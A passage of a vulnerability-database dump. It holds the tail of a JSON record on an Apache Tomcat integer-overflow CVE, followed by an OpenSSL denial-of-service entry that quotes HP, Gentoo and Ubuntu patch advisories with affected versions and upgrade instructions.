        "trust": 0.8,
        "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_0075_numeric_errors"
      },
      {
        "title": "October 2014 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/october_2014_critical_patch_update"
      },
      {
        "title": "VMSA-2014-0012",
        "trust": 0.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
      },
      {
        "title": "HS15-007",
        "trust": 0.8,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs15-007/index.html"
      },
      {
        "title": "apache-tomcat-7.0.53",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=50506"
      },
      {
        "title": "apache-tomcat-8.0.5",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=50510"
      },
      {
        "title": "apache-tomcat-6.0.41",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=50505"
      },
      {
        "title": "apache-tomcat-8.0.5",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=50509"
      },
      {
        "title": "apache-tomcat-6.0.41",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=50504"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-189",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0075"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://advisories.mageia.org/mgasa-2014-0268.html"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0765.html"
      },
      {
        "trust": 1.7,
        "url": "http://tomcat.apache.org/security-7.html"
      },
      {
        "trust": 1.7,
        "url": "http://tomcat.apache.org/security-6.html"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=144498216801440\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/bid/67671"
      },
      {
        "trust": 1.6,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-february/150282.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.debian.org/security/2016/dsa-3447"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
      },
      {
        "trust": 1.6,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0675.html"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141017844705317\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60729"
      },
      {
        "trust": 1.6,
        "url": "http://tomcat.apache.org/security-8.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59121"
      },
      {
        "trust": 1.6,
        "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1578341"
      },
      {
        "trust": 1.6,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59732"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59678"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59835"
      },
      {
        "trust": 1.6,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04851013"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:052"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59616"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:053"
      },
      {
        "trust": 1.6,
        "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 1.6,
        "url": "http://linux.oracle.com/errata/elsa-2014-0865.html"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681528"
      },
      {
        "trust": 1.6,
        "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1579262"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141390017113542\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www.novell.com/support/kb/doc.php?id=7010166"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59873"
      },
      {
        "trust": 1.6,
        "url": "http://www.debian.org/security/2016/dsa-3530"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2014/dec/23"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:084"
      },
      {
        "trust": 1.6,
        "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1578337"
      },
      {
        "trust": 1.6,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0720.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59849"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680603"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678231"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60793"
      },
      {
        "trust": 1.0,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0075"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/37220405a377c0182d2afdbc36461c4783b2930fbeae3a17f1333113%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/39ae1f0bd5867c15755a6f959b271ade1aea04ccdc3b2e639dcd903b%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/b84ad1258a89de5c9c853c7f2d3ad77e5b8b2930be9e132d5cef6b95%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/b8a1bf18155b552dcf9a928ba808cbadad84c236d85eab3033662cfb%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/r03c597a64de790ba42c167efacfa23300c3d6c9fe589ab87fe02859c%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/r587e50b86c1a96ee301f751d50294072d142fd6dc08a8987ae9f3a9b%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0099"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0075"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0075"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0096"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/37220405a377c0182d2afdbc36461c4783b2930fbeae3a17f1333113@%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/39ae1f0bd5867c15755a6f959b271ade1aea04ccdc3b2e639dcd903b@%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/b8a1bf18155b552dcf9a928ba808cbadad84c236d85eab3033662cfb@%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/b84ad1258a89de5c9c853c7f2d3ad77e5b8b2930be9e132d5cef6b95@%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0075.html"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0096.html"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0099.html"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0119"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0227"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4322"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0227"
      },
      {
        "trust": 0.2,
        "url": "http://www.mandriva.com/en/support/security/"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0119"
      },
      {
        "trust": 0.2,
        "url": "http://www.mandriva.com/en/support/security/advisories/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4590"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4590"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4322"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0099"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0096"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/site/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4286"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0050"
      },
      {
        "trust": 0.1,
        "url": "http://advisories.mageia.org/mgasa-2014-0149.html"
      },
      {
        "trust": 0.1,
        "url": "http://advisories.mageia.org/mgasa-2014-0110.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0050"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2013-4002"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6153"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3481"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3490"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3530"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=data.services.platform\u0026downloadtype=securitypatches\u0026version=6.0.0"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2013-5855"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-0099"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3481"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5855"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-0096"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0193"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3490"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3577"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3577"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4002"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-0193"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-0227"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-0075"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2012-6153"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-0119"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3530"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0827.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0843.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0119.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4286"
      },
      {
        "trust": 0.1,
        "url": "http://advisories.mageia.org/mgasa-2014-0148.html"
      },
      {
        "trust": 0.1,
        "url": "http://advisories.mageia.org/mgasa-2015-0081.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=2.0.1"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0833.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0835.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/knowledge/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "http://software.hp.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0098"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6438"
      },
      {
        "trust": 0.1,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.1,
        "url": "https://www.hp.com/go/swa"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3981"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4248"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0865.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "db": "PACKETSTORM",
        "id": "131089"
      },
      {
        "db": "PACKETSTORM",
        "id": "131227"
      },
      {
        "db": "PACKETSTORM",
        "id": "127325"
      },
      {
        "db": "PACKETSTORM",
        "id": "127367"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "127338"
      },
      {
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "db": "PACKETSTORM",
        "id": "127413"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0075"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "db": "PACKETSTORM",
        "id": "131089"
      },
      {
        "db": "PACKETSTORM",
        "id": "131227"
      },
      {
        "db": "PACKETSTORM",
        "id": "127325"
      },
      {
        "db": "PACKETSTORM",
        "id": "127367"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "127338"
      },
      {
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "db": "PACKETSTORM",
        "id": "127413"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0075"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-06-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "date": "2015-03-30T21:20:12",
        "db": "PACKETSTORM",
        "id": "131089"
      },
      {
        "date": "2015-04-01T00:39:42",
        "db": "PACKETSTORM",
        "id": "131227"
      },
      {
        "date": "2014-07-02T21:43:13",
        "db": "PACKETSTORM",
        "id": "127325"
      },
      {
        "date": "2014-07-07T20:28:43",
        "db": "PACKETSTORM",
        "id": "127367"
      },
      {
        "date": "2015-03-03T16:54:21",
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "date": "2014-07-03T23:00:39",
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "date": "2014-07-03T23:00:52",
        "db": "PACKETSTORM",
        "id": "127338"
      },
      {
        "date": "2014-10-21T20:30:24",
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "date": "2014-07-09T18:51:14",
        "db": "PACKETSTORM",
        "id": "127413"
      },
      {
        "date": "2014-05-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      },
      {
        "date": "2014-05-31T11:17:13.093000",
        "db": "NVD",
        "id": "CVE-2014-0075"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-11-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "date": "2019-04-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      },
      {
        "date": "2023-11-07T02:18:07.613000",
        "db": "NVD",
        "id": "CVE-2014-0075"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "127325"
      },
      {
        "db": "PACKETSTORM",
        "id": "127367"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "127338"
      },
      {
        "db": "PACKETSTORM",
        "id": "127413"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      }
    ],
    "trust": 1.2
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Apache Tomcat of  java/org/apache/coyote/http11/filters/ChunkedInputFilter.java Integer overflow vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "digital error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      }
    ],
    "trust": 0.6
  }
}

VAR-201506-0210

Vulnerability from variot - Updated: 2024-07-23 20:20

The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to cause a denial-of-service condition. The following are vulnerable: OpenSSL 1.0.2 prior to 1.0.2b OpenSSL 1.0.1 prior to 1.0.1n OpenSSL 1.0.0 prior to 1.0.0s OpenSSL 0.9.8 prior to 0.9.8zg. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04739301

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04739301 Version: 1

HPSBGN03371 rev.1 - HP IceWall Products running OpenSSL, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2015-07-10 Last Updated: 2015-07-10

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP IceWall Products running OpenSSL. The vulnerabilities could be exploited remotely resulting in Denial of Service (DoS). Product Impacted Versions Impacted CVEs

HP IceWall MCRP v3.0 CVE-2015-1789 CVE-2015-1790 CVE-2015-1792

HP IceWall SSO Dfw v10.0 CVE-2015-1789 CVE-2015-1790 CVE-2015-1792

HP IceWall SSO Agent Option v10.0 CVE-2015-1789 CVE-2015-1790 CVE-2015-1792

HP IceWall SSO Certd v10.0 CVE-2015-1792

HP IceWall Federation Agent v3.0 CVE-2015-1792

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP recommends applying the latest OS vendor security patches for OpenSSL to resolve the vulnerabilities for HP IceWall Products.

HP IceWall SSO Dfw v10.0 and Certd v10.0, which are running on RHEL, could be using either the OS bundled OpenSSL library or the OpenSSL bundled with HP IceWall. If still using the OpenSSL bundled with HP IceWall, please apply the latest OS vendor security patches for OpenSSL and switch to the OpenSSL library bundled with the OS.

Documents are available at the following location with instructions to switch to the OS bundled OpenSSL library:

http://www.hp.com/jp/icewall_patchaccess

Note: The HP IceWall product is only available in Japan.

HISTORY Version:1 (rev.1) - 10 July 2015 Initial release

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

                                       https://security.gentoo.org/

Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: June 22, 2015 Bugs: #551832 ID: 201506-02

Synopsis

Multiple vulnerabilities have been found in OpenSSL that can result in either Denial of Service or information disclosure.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 dev-libs/openssl < 1.0.1o >= 0.9.8z_p7 >= 1.0.1o

Description

Multiple vulnerabilities have been found in OpenSSL. Please review the CVE identifiers referenced below for details.

Resolution

All OpenSSL 1.0.1 users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1o"

All OpenSSL 0.9.8 users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8z_p7"

References

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201506-02

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

. ============================================================================ Ubuntu Security Notice USN-2639-1 June 11, 2015

openssl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 15.04
Ubuntu 14.10
Ubuntu 14.04 LTS
Ubuntu 12.04 LTS

Summary:

Several security issues were fixed in OpenSSL.

Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

Praveen Kariyanahalli, Ivan Fratric and Felix Groebert discovered that OpenSSL incorrectly handled memory when buffering DTLS data. (CVE-2014-8176)

Joseph Barr-Pixton discovered that OpenSSL incorrectly handled malformed ECParameters structures. (CVE-2015-1788)

Robert Swiecki and Hanno B=C3=B6ck discovered that OpenSSL incorrectly handled certain ASN1_TIME strings. (CVE-2015-1791)

Johannes Bauer discovered that OpenSSL incorrectly handled verifying signedData messages using the CMS code. (CVE-2015-1792)

As a security improvement, this update also modifies OpenSSL behaviour to reject DH key sizes below 768 bits, preventing a possible downgrade attack.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 15.04: libssl1.0.0 1.0.1f-1ubuntu11.4

Ubuntu 14.10: libssl1.0.0 1.0.1f-1ubuntu9.8

Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.15

Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.31

After a standard system update you need to reboot your computer to make all the necessary changes.

References: http://www.ubuntu.com/usn/usn-2639-1 CVE-2014-8176, CVE-2015-1788, CVE-2015-1789, CVE-2015-1790, CVE-2015-1791, CVE-2015-1792

Package Information: https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu11.4 https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu9.8 https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.15 https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.31 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512